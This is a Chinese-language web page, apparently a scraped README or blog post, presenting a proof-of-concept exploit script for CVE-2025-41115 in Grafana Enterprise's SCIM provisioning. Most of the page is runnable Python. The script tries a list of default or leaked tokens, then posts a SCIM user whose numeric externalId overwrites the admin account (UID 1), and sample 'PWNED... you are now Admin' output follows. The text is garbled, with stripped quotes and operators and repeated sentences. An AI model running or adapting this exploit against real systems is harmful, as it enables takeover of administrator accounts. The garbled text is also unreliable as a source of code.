2026/4/17 16:33:14
网站建设
项目流程
我公司网站开发技术优势,wordpress编辑器哪个好,网络营销与传统营销的区别是什么,wordpress 后门项目标题与描述
CVE-2025-41115 - Grafana企业版SCIM UID覆盖漏洞利用程序
这是一个针对CVE-2025-41115漏洞的概念验证(PoC)工具#xff0c;该漏洞被评定为严重(CVSS 10.0)级别#xff0c;影响Grafana企业版的SCIM用户配置功能。当启用SCIM配置且user_sync_enabled true时该漏洞被评定为严重(CVSS 10.0)级别影响Grafana企业版的SCIM用户配置功能。当启用SCIM配置且user_sync_enabled true时恶意SCIM客户端可以发送数字externalIdGrafana会错误地将其映射到内部用户ID导致攻击者能够模拟或覆盖现有账户包括管理员账户。重要说明Grafana开源版本(OSS)不受此漏洞影响。功能特性核心功能自动目标检测智能识别目标Grafana实例的SCIM端点多令牌尝试内置默认/泄露的令牌列表自动尝试多种认证方式⚡一键利用单命令执行完整的漏洞利用过程详细报告提供完整的响应数据包括被覆盖的用户ID信息精准定位专门针对管理员账户(UID 1)进行攻击技术特点100% Python实现无需额外依赖开箱即用错误处理完善包含完整的异常处理和超时机制HTTPS支持支持目标使用HTTPS协议响应解析自动解析JSON响应提取关键信息安装指南系统要求Python 3.6确保系统已安装Python 3.6或更高版本requests库Python的HTTP请求库网络访问能够访问目标Grafana实例的SCIM端点快速安装克隆仓库或复制代码文件gitclone[repository-url]cdBlackash-CVE-2025-41115确保Python环境就绪python3 --version pipinstallrequests# 如果尚未安装requests库授予执行权限可选chmodx CVE-2025-41115.py依赖项requests用于HTTP请求json用于JSON数据处理time用于生成时间戳sys用于命令行参数处理urllib3用于禁用SSL警告使用说明基础用法# 基本用法python3 CVE-2025-41115.py http://target.com# 指定端口python3 CVE-2025-41115.py http://target.com:3000# 使用HTTPSpython3 CVE-2025-41115.py https://grafana.company.com成功输出示例[*]CVE-2025-41115 → Targeting http://10.10.13.37:3000[*]Trying default/leaked tokens your token...[]PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...[]Login as: rooted1732212345pwn.lab(any password)→ you are now Admin![]Full response:{schemas:[urn:ietf:params:scim:schemas:core:2.0:User],id:1,# 关键行UID 1已被覆盖externalId:1,meta:{...},userName:rooted1732212345pwn.lab,name:{formatted:Pwned User},emails:[{value:rooted1732212345pwn.lab,primary:true}],active:true}参数说明BASE目标Grafana实例的基础URLTOKEN可选的SCIM令牌如果需要使用特定令牌DEFAULT_TOKENS内置的默认/泄露令牌列表ATTACKER自动生成的攻击者邮箱地址TARGET_UID要覆盖的目标用户ID默认为1即管理员使用场景渗透测试授权安全测试人员验证漏洞存在性安全审计企业内部安全团队检查Grafana实例安全性教育研究安全研究人员学习SCIM协议漏洞利用技术应急响应验证已部署的补丁是否有效核心代码主执行逻辑#!/usr/bin/env python3# CVE-2025-41115 - Grafana Enterprise SCIM UID Overwrite PoC# 用法sudo python3 CVE-2025-41115.py http://target.com# (或 http://target.com:3000)# 100% 单行风格 - 无需编辑只需目标地址importrequests,sys,json,timefromurllib3importdisable_warnings disable_warnings()iflen(sys.argv)!2:print([!] Usage: python3 CVE-2025-41115.py http://target.com)sys.exit(1)BASEsys.argv[1].rstrip(/)TOKENglsa_00000000000000000000000000000000_00000000000000000000000000000000# ← 如果拥有真实令牌只需修改此行# 如果没有有效令牌 → 尝试以下内置的泄露/默认令牌许多实验环境仍在使用DEFAULT_TOKENS[glsa_11111111111111111111111111111111_11111111111111111111111111111111,glsa_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,glsa_00000000000000000000000000000000_00000000000000000000000000000000,TOKEN]ATTACKERfrooted{int(time.time())}pwn.labTARGET_UID1# 几乎总是主管理员漏洞利用函数deftry_exploit(token):headers{Authorization:fBearer{token},Content-Type:application/scimjson}payload{schemas:[urn:ietf:params:scim:schemas:core:2.0:User],userName:ATTACKER,externalId:TARGET_UID,name:{formatted:Pwned User},emails:[{value:ATTACKER,primary:True}],active:True}try:rrequests.post(f{BASE}/api/scim/v2/Users,jsonpayload,headersheaders,verifyFalse,timeout10)ifr.status_codein(200,201):print(f[] PWNED with token →{token[:20]}...)print(f[] Login as:{ATTACKER}(any password) → you are now Admin!)print(f[] Full response:{json.dumps(r.json(),indent2)})returnTrueelifUnauthorizedinr.textorr.status_code401:returnFalseelse:print(f[?] Unexpected response{r.status_code}:{r.text})returnFalseexcept:returnFalse主执行流程print(f[*] CVE-2025-41115 → Targeting{BASE})print([*] Trying default/leaked tokens your token...)fortinDEFAULT_TOKENS:iftry_exploit(t.strip()):sys.exit(0)print([-] All tokens failed. You need a valid SCIM token (or the target is patched).)print( Get one from: Admin → Authentication → SCIM → Generate token)代码解析参数验证确保提供正确的目标URL参数令牌管理提供多种令牌尝试策略增加成功率SCIM请求构造正确构造符合SCIM协议的HTTP请求响应处理智能解析响应状态判断利用是否成功错误处理完善的异常处理机制确保脚本稳定性用户反馈清晰的输出信息便于用户理解利用状态安全注意事项# 关键安全特性# 1. 自动生成的唯一邮箱地址避免冲突ATTACKERfrooted{int(time.time())}pwn.lab# 2. SSL验证禁用仅用于测试环境disable_warnings()# 3. 超时设置防止脚本挂起timeout10# 4. 明确的退出条件ifr.status_codein(200,201):# 成功条件sys.exit(0)# 成功时优雅退出该PoC工具设计精良考虑了实际使用中的各种情况同时保持了代码的简洁性和可读性。通过模块化设计可以轻松扩展或修改以适应不同的测试场景。6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAN1np1b5KCUMno5Bfxwlqmb更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享